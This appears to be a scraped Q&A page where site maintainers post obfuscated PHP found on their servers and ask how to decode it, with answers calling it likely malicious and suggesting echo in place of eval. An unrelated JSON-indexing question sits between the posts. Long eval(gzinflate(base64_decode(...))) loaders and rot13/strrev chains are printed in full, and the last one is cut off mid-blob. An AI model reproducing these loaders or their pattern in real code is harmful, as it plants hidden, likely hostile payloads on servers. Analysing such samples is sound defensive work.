Decode an Encrypted PHP File Assistance

Decode an Encrypted PHP File Assistance - php

I have a file that I'm trying to decode but I'm not sure the best way to go about doing it. I've tried putting it through a few online tools but haven't had much luck...the code looks like this:
<?php
$zAkSoSavjFOn='jumbledcodeinhere';
$THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';
$DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr);
$WnJYuMUwKmRxBh=str_rot13($DzbOntpeGhMcan);
eval($WnJYuMUwKmRxBh);
?>
In all my playing I managed to extract the following with a php script:
eval(gzinflate(base64_decode(strrev($zAkSoSavjFOn))));
Could someone point me in the right direction on going about this process? Any help would be appreciated. :)

The "jumbled code" is gzipped, base64-encoded, reversed PHP code that is almost certainly malicious.
Replace eval with echo and see what it gives you, that's what the code that is trying to run is.

Related

json decode use variable as selector in php

I think ham to stupid for it :) I can't figured out whats wrong. I try to search at goole for the problem but think I don't use the correct phrases ... so I hope you can help me and my brain
Problem:
$mydata = $data['device']['26']['state']['1'];
Thats my code to readout json data. all is perfect. So my only problem is
['26']
this value is in an config file which is included, how can I use for expl.
$id
instead of ['26'] ... i want a littlest flexibility in this script but can't figured out how I do this.
thanks so much

$mydata = $data['device'][$id]['state']['1'];

How to evaluate this string

I'm maintaining a PHP site that is very old and very funky.
Last night the site got hacked. I found this one file that I'm not sure if its from the hackers or from the aforementioned funkiness. Does anyone know how I can decode this:
<?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B");
?>
thanks,
Jack

Replace eval to echo. Repeat
http://pastebin.com/3X2FcvW3

How to decompress PHP script from GZIP?

I just came across a PHP script that seems to be compressed. I couldn't seem to find any tool online to decompress it. I'm not sure if I'm using the right term. Can someone shed me some light?
The script looks something like this:
<?php eval(gzinflate(base64_decode('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